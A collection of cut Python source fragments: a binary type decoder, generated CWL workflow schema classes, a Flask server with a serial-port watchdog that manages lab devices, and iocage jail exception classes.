decoder.decoded_value = struct.unpack('>q', data)[0]
except Exception:
raise ValueError("Invalid long value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_float(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>f', data)[0]
except Exception:
raise ValueError("Invalid float value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_double(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>d', data)[0]
except Exception:
raise ValueError("Invalid double value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_timestamp(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>q', data)[0] # TODO: datetime
except Exception:
raise ValueError("Invalid timestamp value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_uuid(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 16)
try:
decoder.decoded_value = uuid.UUID(bytes=data)
except Exception:
raise ValueError("Invalid UUID value: {}".format(data))
decoder.progress(16)
decoder.state = DecoderState.done
def decode_binary_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
decoder.progress(1)
if length == 0:
decoder.decoded_value = None
else:
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading binary data: {}".format(data))
decoder.progress(length)
decoder.state = DecoderState.done
def decode_binary_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
decoder.progress(4)
if length == 0:
decoder.decoded_value = None
else:
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading binary data: {}".format(data))
decoder.progress(length)
decoder.state = DecoderState.done
def decode_string_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data.decode('utf-8')
except Exception:
raise ValueError("Error reading string data: {}".format(data))
decoder.progress(1)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_string_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data.decode('utf-8')
except Exception:
raise ValueError("Error reading string data: {}".format(data))
decoder.progress(4)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_symbol_small(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>B', _read(buffer, 1))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading symbol data: {}".format(data))
decoder.progress(1)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_symbol_large(decoder, buffer):
# type: (Decoder, IO) -> None
length = struct.unpack('>L', _read(buffer, 4))[0]
data = _read(buffer, length)
try:
decoder.decoded_value = data
except Exception:
raise ValueError("Error reading symbol data: {}".format(data))
decoder.progress(4)
decoder.progress(length)
decoder.state = DecoderState.done
def decode_empty_list(decoder, buffer):
# type: (Decoder, IO) -> None
decoder.decoded_value = []
decoder.state = DecoderState.done
def decode_list_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, count=count)
decoder.decoded_value = items
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small list.")
decoder.state = DecoderState.done
def decode_list_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, count=count)
decoder.decoded_value = items
decoder.progress(8)
decoder.progress(size - 4)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding large list.")
decoder.state = DecoderState.done
def decode_map_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, count=count)
decoder.decoded_value = [(items[i], items[i+1]) for i in range(0, len(items), 2)]
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small map.")
decoder.state = DecoderState.done
def decode_map_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, count=count)
decoder.decoded_value = [(items[i], items[i+1]) for i in range(0, len(items), 2)]
decoder.progress(8)
decoder.progress(size - 4)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding large map.")
decoder.state = DecoderState.done
def decode_array_small(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>B', _read(buffer, 1))[0]
count = struct.unpack('>B', _read(buffer, 1))[0]
items = decode_value(buffer, length_bytes=size - 1, sub_constructors=False, count=count)
decoder.decoded_value = items
decoder.progress(2)
decoder.progress(size - 1)
except ValueError:
raise
except Exception:
raise ValueError("Error decoding small array.")
decoder.state = DecoderState.done
def decode_array_large(decoder, buffer):
# type: (Decoder, IO) -> None
try:
size = struct.unpack('>L', _read(buffer, 4))[0]
count = struct.unpack('>L', _read(buffer, 4))[0]
items = decode_value(buffer, length_bytes=size - 4, sub_constructors=False, count=count)
decoder.decoded_value = items
| |
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(
[
"label",
"secondaryFiles",
"streamable",
"doc",
"id",
"outputBinding",
"format",
]
)
class ProcessRequirement(Savable):
"""
A process requirement declares a prerequisite that may or must be fulfilled
before executing a process. See [`Process.hints`](#process) and
[`Process.requirements`](#process).
Process requirements are the primary mechanism for specifying extensions to
the CWL core specification.
"""
pass
class Process(Savable):
"""
The base executable type in CWL is the `Process` object defined by the
document. Note that the `Process` object is abstract and cannot be
directly executed.
"""
pass
class InlineJavascriptRequirement(ProcessRequirement):
"""
Indicates that the workflow platform must support inline Javascript expressions.
If this requirement is not present, the workflow platform must not perform expression
interpolatation.
"""
def __init__(
self,
expressionLib: Optional[Any] = None,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.class_ = "InlineJavascriptRequirement"
self.expressionLib = expressionLib
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "InlineJavascriptRequirement":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
if _doc.get("class") != "InlineJavascriptRequirement":
raise ValidationException("Not a InlineJavascriptRequirement")
if "expressionLib" in _doc:
try:
expressionLib = load_field(
_doc.get("expressionLib"),
union_of_None_type_or_array_of_strtype,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `expressionLib` field is not valid because:",
SourceLine(_doc, "expressionLib", str),
[e],
)
)
else:
expressionLib = None
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `class`, `expressionLib`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException(
"Trying 'InlineJavascriptRequirement'", None, _errors__
)
return cls(
expressionLib=expressionLib,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
r["class"] = "InlineJavascriptRequirement"
if self.expressionLib is not None:
r["expressionLib"] = save(
self.expressionLib,
top=False,
base_url=base_url,
relative_uris=relative_uris,
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["class", "expressionLib"])
class SchemaDefRequirement(ProcessRequirement):
"""
This field consists of an array of type definitions which must be used when
interpreting the `inputs` and `outputs` fields. When a `type` field
contain a IRI, the implementation must check if the type is defined in
`schemaDefs` and use that definition. If the type is not found in
`schemaDefs`, it is an error. The entries in `schemaDefs` must be
processed in the order listed such that later schema definitions may refer
to earlier schema definitions.
"""
def __init__(
self,
types: Any,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.class_ = "SchemaDefRequirement"
self.types = types
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "SchemaDefRequirement":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
if _doc.get("class") != "SchemaDefRequirement":
raise ValidationException("Not a SchemaDefRequirement")
try:
types = load_field(
_doc.get("types"),
array_of_union_of_InputRecordSchemaLoader_or_InputEnumSchemaLoader_or_InputArraySchemaLoader,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `types` field is not valid because:",
SourceLine(_doc, "types", str),
[e],
)
)
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `class`, `types`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException("Trying 'SchemaDefRequirement'", None, _errors__)
return cls(
types=types,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
r["class"] = "SchemaDefRequirement"
if self.types is not None:
r["types"] = save(
self.types, top=False, base_url=base_url, relative_uris=relative_uris
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["class", "types"])
class EnvironmentDef(Savable):
"""
Define an environment variable that will be set in the runtime environment
by the workflow platform when executing the command line tool. May be the
result of executing an expression, such as getting a parameter from input.
"""
def __init__(
self,
envName: Any,
envValue: Any,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields = extension_fields
else:
self.extension_fields = CommentedMap()
if loadingOptions:
self.loadingOptions = loadingOptions
else:
self.loadingOptions = LoadingOptions()
self.envName = envName
self.envValue = envValue
@classmethod
def fromDoc(
cls,
doc: Any,
baseuri: str,
loadingOptions: LoadingOptions,
docRoot: Optional[str] = None,
) -> "EnvironmentDef":
_doc = copy.copy(doc)
if hasattr(doc, "lc"):
_doc.lc.data = doc.lc.data
_doc.lc.filename = doc.lc.filename
_errors__ = []
try:
envName = load_field(
_doc.get("envName"),
strtype,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `envName` field is not valid because:",
SourceLine(_doc, "envName", str),
[e],
)
)
try:
envValue = load_field(
_doc.get("envValue"),
union_of_strtype_or_ExpressionLoader,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `envValue` field is not valid because:",
SourceLine(_doc, "envValue", str),
[e],
)
)
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `envName`, `envValue`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException("Trying 'EnvironmentDef'", None, _errors__)
return cls(
envName=envName,
envValue=envValue,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
if self.envName is not None:
r["envName"] = save(
self.envName, top=False, base_url=base_url, relative_uris=relative_uris
)
if self.envValue is not None:
r["envValue"] = save(
self.envValue, top=False, base_url=base_url, relative_uris=relative_uris
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["envName", "envValue"])
class CommandLineBinding(InputBinding):
"""
When listed under `inputBinding` in the input schema, the term
"value" refers to the the corresponding value in the input object. For
binding objects listed in `CommandLineTool.arguments`, the term "value"
refers to the effective value after evaluating `valueFrom`.
The binding behavior when building the command line depends on the data
type of the value. If there is a mismatch between the type described by
the input schema and the effective value, such as resulting from an
expression evaluation, an implementation must use the data type of the
effective value.
- **string**: Add `prefix` and the string to the command line.
- **number**: Add `prefix` and decimal representation to command line.
- **boolean**: If true, add `prefix` to the command line. If false, add
nothing.
- **File**: Add `prefix` and the value of
[`File.path`](#File) to the command line.
- **Directory**: Add `prefix` and the value of
[`Directory.path`](#Directory) to the command line.
- **array**: If `itemSeparator` is specified, add `prefix` and the join
the array into a single string with `itemSeparator` separating the
items. Otherwise first add `prefix`, then recursively process
individual elements.
If the array is empty, it does not add anything to command line.
- **object**: Add `prefix` only, and recursively add object fields for
which `inputBinding` is specified.
- **null**: Add nothing.
"""
def __init__(
self,
loadContents: Optional[Any] = None,
position: Optional[Any] = None,
prefix: Optional[Any] = None,
separate: Optional[Any] = None,
itemSeparator: Optional[Any] = None,
valueFrom: Optional[Any] = None,
shellQuote: Optional[Any] = None,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields | |
<gh_stars>1-10
import sys
from multiprocessing import Process, Pipe
import threading
import json
import queue
# import time
from datetime import datetime
from collections import deque
# import logging
from flask import Flask, request
import numpy as np
from .DeviceDriver import driver_mapping
from .SerialCOM import *
from .DeviceFinder import *
if 'Windows' not in myplatform:
from ftd2xx.ftd2xx import DeviceError
class DeviceManager(object):
""" Handles sending/receiving messages for each device """
def __init__(self, serial_number, driver, com, max_polling_rate=50.0):
self._serial_number = serial_number
self._driver = driver
self._com = com
# the generic query message which is sent every time the user queries the device
self._query_message = {}
self._query_device_data = {} # some devices need this to translate the response back
# device's current values (response to query command)
self._current_values = {}
# polling rate for this device
self._polling_rate = 0
self._com_times = deque(maxlen=20)
self._polling_rate_max = max_polling_rate # Hz
self._set_command_queue = queue.Queue()
self._terminate = False
@property
def driver(self):
return self._driver
@property
def port(self):
return self._com.port
@property
def polling_rate(self):
return self._polling_rate
@property
def polling_rate_max(self):
return self._polling_rate_max
@polling_rate_max.setter
def polling_rate_max(self, polling_rate_max):
self._polling_rate_max = polling_rate_max
@property
def current_values(self):
return self._current_values
@property
def serial_number(self):
return self._serial_number
@property
def query_message(self):
return self._query_message
@query_message.setter
def query_message(self, device_data):
device_id = device_data['device_id']
self._query_device_data[device_id] = device_data
self._query_message[device_id] = self._driver.translate_gui_to_device(device_data)
def add_command_to_queue(self, cmd):
self._set_command_queue.put(cmd)
def run(self):
while not self._terminate:
t1 = datetime.now()
self._waiting_for_resp = True
if not self._set_command_queue.empty():
# try to send the command to the device
cmd = self._set_command_queue.get_nowait()
msgs = self._driver.translate_gui_to_device(cmd)
# print(msgs)
for msg in msgs:
# this takes some time
try:
device_response = self._com.send_message(msg)
except Exception as e:
# print('Unable to send set message! Exception: {}'.format(e))
device_response = 'Error, got exception {}'.format(e)
else:
# update the device's current values
# this could take some time
if self._query_message is not None:
for device_id, query_message in self._query_message.items():
com_resp_list = []
for msg in query_message:
try:
com_resp = self._com.send_message(msg)
com_resp_list.append(com_resp)
except Exception as e:
com_resp_list.append(None)
try:
resp = self._driver.translate_device_to_gui(
com_resp_list, self._query_device_data[device_id])
except:
continue
# add additional info to be shown in the GUI
resp['timestamp'] = time.time()
resp['polling_rate'] = self._polling_rate
self._current_values[device_id] = resp
t2 = datetime.now()
delta = (t2 - t1).total_seconds()
# check if elapsed time is < 1/maximum polling rate. If true, sleep for the difference
if 1.0 > self._polling_rate_max * delta:
time.sleep(1.0 / self._polling_rate_max - delta)
self._com_times.append((datetime.now() - t1).total_seconds())
self.update_polling_rate()
self._com.close()
def update_polling_rate(self):
self._polling_rate = 1.0 / np.mean(self._com_times)
def terminate(self):
self._terminate = True
def serial_watchdog(com_pipe, debug, port_identifiers):
"""
Function to be called as a process. Watches the serial ports and looks for devices plugged in
or removed.
Underscore at beginning prevents flask_classy from making it a route in the Flask server.
"""
_keep_communicating2 = True
_com_freq = 2.0 # (Hz)
_com_period = 1.0 / _com_freq # (s)
_debug = debug
if _debug:
print(port_identifiers)
serial_finder = SerialDeviceFinder(port_identifiers)
finder_list = [serial_finder]
if "Windows" not in myplatform:
ftdi_finder = FTDIDeviceFinder(port_identifiers)
finder_list.append(ftdi_finder)
while _keep_communicating2:
try:
# Do the timing of this process:
_thread_start_time = time.time()
if com_pipe.poll():
_in_message = com_pipe.recv()
if _in_message[0] == "com_period":
_com_period = _in_message[1]
elif _in_message[0] == "shutdown":
break
elif _in_message[0] == "port_identifiers":
_port_identifiers = _in_message[1]
# update each finder's identifier list
for finder in finder_list:
finder.identifiers = _port_identifiers
elif _in_message[0] == "debug":
_debug = _in_message[1]
_device_added = False
_device_removed = False
_finder_info = {}
for finder in finder_list:
_finder_info[finder.name] = finder.find_devices()
if _debug:
print(_finder_info)
if _finder_info[finder.name]['added'] != {}:
_device_added = True
if _finder_info[finder.name]['obsolete']:
_device_removed = True
if _device_added or _device_removed:
# If something has changed:
if _debug:
pass # need to update this block
# print("Updated List:")
# for _key, item in _current_ports_by_ids.items():
# print ("{} #{} at port {}".format(item["identifier"], _key, item["port"]))
pipe_message = ["updated_list", _finder_info]
com_pipe.send(pipe_message)
# Do the timing of this process:
_sleepy_time = _com_period - time.time() + _thread_start_time
if _sleepy_time > 0.0:
if _debug:
print("Watchdog alive, sleeping for {} s.".format(_sleepy_time))
time.sleep(_sleepy_time)
except KeyboardInterrupt:
print("Watchdog got keyboard interrupt")
com_pipe.send("shutdown")
break
# /===============================\
# | |
# | Flask server |
# | |
# \===============================/
app = Flask(__name__)
# disable flask output messages (makes server easier to debug)
# log = logging.getLogger('werkzeug')
# log.setLevel(logging.ERROR)
_mydebug = False
_pipe_server, pipe_serial_watcher = Pipe()
_watch_proc = Process(target=serial_watchdog,
args=(pipe_serial_watcher, _mydebug, driver_mapping))
_watch_proc.daemon = True
_keep_communicating = False
_initialized = False
_devices = {}
_threads = {}
_ftdi_serial_port_mapping = {} # gui uses serial numbers, server uses ports
_current_responses = {}
@app.route("/initialize/")
def initialize():
global _initialized
global _keep_communicating
if _initialized:
return "Server has already been initialized"
else:
_keep_communicating = True
threading.Timer(0.1, listen_to_pipe).start()
time.sleep(0.2) # Need to wait a little for the thread to be ready to receive initial info of watchdog
_initialized = True
if not _watch_proc.is_alive():
_watch_proc.start()
return "Initializing Control System Server services...Started the watchdog process."
else:
return "Initializing Control System Server services...There was already a watchdog process running!"
@app.route("/device/set", methods=['GET', 'POST'])
def set_value_on_device():
# Load the data stream
device_data = json.loads(request.form['data'])
device_data["set"] = True
# For reference: This is the message from the GUI:
# device_data = {'device_driver': device_driver_name,
# 'device_id': device_id,
# 'locked_by_server': False,
# 'channel_ids': [channel_ids],
# 'precisions': [precisions],
# 'values': [values],
# 'data_types': [types]}
# --- Handle the various id numbers:
# Server side, we use <vid>_<pid>_<id> for now, but a better system is necessary!
# Some devices are master/slave (like the Matsusada CO series)
# For those we need to send commands to the master only
# e.g. if serial number is XXXXXX_2, we look for device XXXXXX, and
# device data should then use only the '2' as the id.
client_side_device_id = device_data['device_id']
device_id_parts = client_side_device_id.split("_")
master_device_id = device_id_parts[0]
driver_name = device_data["device_driver"]
if driver_name not in driver_mapping.keys():
# device not foundin driver list
return "ERROR: Device Driver not found in driver_mapping"
else:
if len(device_id_parts) > 1:
slave_device_id = device_id_parts[1]
device_data['device_id'] = device_id_parts[1]
else:
slave_device_id = master_device_id
vidpid = driver_mapping[driver_name]["vid_pid"]
server_side_device_id = "{}_{}_{}".format(int(vidpid[0]), int(vidpid[1]), master_device_id)
# print("vidpid_id:", server_side_device_id)
device_data['device_id'] = slave_device_id
_devices[server_side_device_id].add_command_to_queue(device_data)
# set_cmd['device_id'] = old_device_id
'''
if _mydebug:
print("The message to the device is: {}".format(msg)
try:
print(msg)
for cmd in msg:
device_response = _comms[port_id].send_message(cmd)
except Exception as e:
device_response = "Error, exception happened: {}".format(e)
return json.dumps(device_response)
'''
return 'Command sent to device'
@app.route("/device/query", methods=['GET', 'POST'])
def query_device():
# Load the data stream
data = json.loads(request.form['data'])
devices_responses = {}
for i, device_data in enumerate(data):
device_data['set'] = False
# --- Handle the various id numbers:
# Server side, we use <vid>_<pid>_<id> for now, but a better system is necessary!
# Some devices are master/slave (like the Matsusada CO series)
# For those we need to send commands to the master only
# e.g. if serial number is XXXXXX_2, we look for device XXXXXX, and
# device data should then use only the '2' as the id.
client_side_device_id = device_data['device_id']
device_id_parts = client_side_device_id.split("_")
master_device_id = device_id_parts[0]
driver_name = device_data["device_driver"]
if driver_name not in driver_mapping.keys():
# device not foundin driver list
devices_responses[client_side_device_id] = "ERROR: Device Driver not found in driver_mapping"
else:
if len(device_id_parts) > 1:
slave_device_id = device_id_parts[1]
device_data['device_id'] = device_id_parts[1]
else:
slave_device_id = master_device_id
vidpid = driver_mapping[driver_name]["vid_pid"]
server_side_device_id = "{}_{}_{}".format(int(vidpid[0]), int(vidpid[1]), master_device_id)
# print("vidpid_id:", server_side_device_id)
try:
_devices[server_side_device_id].query_message = device_data
devices_responses[client_side_device_id] = \
_devices[server_side_device_id].current_values[slave_device_id]
except KeyError:
# device not found on server
devices_responses[client_side_device_id] = "ERROR: Device not found on server"
global _current_responses
_current_responses = json.dumps(devices_responses)
return _current_responses
@app.route("/device/active/")
def all_devices():
global _devices
ports = {}
for _id, dm in _devices.items():
ports[_id] = [dm.port, dm.polling_rate, dm.driver.get_driver_name()]
return json.dumps(ports)
def listen_to_pipe():
global _devices
global _threads
global _ftdi_serial_port_mapping
global _keep_communicating
if _pipe_server.poll(1):
gui_message = _pipe_server.recv()
if gui_message == 'shutdown':
_keep_communicating = False
shutdown()
if gui_message[0] == "updated_list":
if _mydebug:
print("Updating ports/ids in main server")
message_info = gui_message[1]
for name, finder_result in message_info.items():
if name == 'serial':
# for key, val in finder_result['current'].items():
# continue
_obsolete = finder_result['obsolete']
_added = finder_result['added']
for _key in _obsolete.keys():
# gracefully remove devices/threads
print('Shutting down device {}'.format(_key))
_devices[_key].terminate()
_threads[_key].join()
if not _threads[_key].is_alive():
print('Removing device {}'.format(_key))
del _devices[_key]
del _threads[_key]
for _key, _port_info in _added.items():
# add devices/threads
_baud_rate = driver_mapping[_port_info["identifier"]]["baud_rate"]
print('Adding device {} on port {} with baud rade {}'.format(_key, _port_info, _baud_rate))
com = SerialCOM(arduino_id=_key,
port_name=_port_info["port"],
baud_rate=_baud_rate,
timeout=1.0)
drv = driver_mapping[_port_info["identifier"]]['driver']()
mpr = driver_mapping[_port_info["identifier"]].get('max_polling_rate', 50)
_devices[_key] = DeviceManager(_key, drv, com, max_polling_rate=mpr)
_threads[_key] = threading.Thread(target=_devices[_key].run)
_threads[_key].start()
elif name | |
# Copyright (c) 2017-2019, <NAME>
# Copyright (c) 2014-2018, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Collection of iocage errors."""
import typing
import uuid
# MyPy
import libzfs # noqa: F401
import libioc.Types # noqa: F401
import libioc.Logger
class IocException(Exception):
"""A well-known exception raised by liblibioc."""
def __init__(
self,
message: str,
level: str="error",
silent: bool=False,
append_warning: bool=False,
warning: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
if (logger is not None) and (silent is False):
logger.__getattribute__(level)(message)
if (append_warning is True) and (warning is not None):
logger.warn(warning)
else:
super().__init__(message)
# Missing Features
class MissingFeature(IocException, NotImplementedError):
"""Raised when an iocage feature is not fully implemented yet."""
def __init__(
self,
feature_name: str,
plural: bool=False,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
message = (
f"Missing Feature: '{feature_name}' "
f"{'are' if plural is True else 'is'} not implemented yet"
)
IocException.__init__(self, message=message)
# Jails
class JailException(IocException):
"""Raised when an exception related to a jail occurs."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
message: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.jail = jail
IocException.__init__(self, message=message, logger=logger)
class JailDoesNotExist(JailException):
"""Raised when the jail does not exist."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' does not exist"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailAlreadyExists(IocException):
"""Raised when the jail already exists."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' already exists"
IocException.__init__(self, message=msg, logger=logger)
class JailNotRunning(IocException):
"""Raised when the jail is not running."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' is not running"
IocException.__init__(self, message=msg, logger=logger)
class JailAlreadyRunning(IocException):
"""Raised when the jail is already running."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' is already running"
IocException.__init__(self, message=msg, logger=logger)
class JailNotFound(IocException):
"""Raised when the jail was not found."""
def __init__(
self,
text: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"No jail matching '{text}' was found"
IocException.__init__(self, message=msg, logger=logger)
class JailNotSupplied(IocException):
"""Raised when no jail was supplied."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "No jail supplied"
IocException.__init__(self, message=msg, logger=logger)
class JailUnknownIdentifier(IocException):
"""Raised when the jail has an unknown identifier."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The jail has no identifier yet"
IocException.__init__(self, message=msg, logger=logger)
class JailBackendMissing(IocException):
"""Raised when the jails backend was not found."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The jail backend is unknown"
IocException.__init__(self, message=msg, logger=logger)
class JailIsTemplate(JailException):
"""Raised when the jail is a template but should not be."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The jail '{jail.name}' is a template"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailNotTemplate(JailException):
"""Raised when the jail is no template but should be one."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The jail '{jail.full_name}' is not a template"
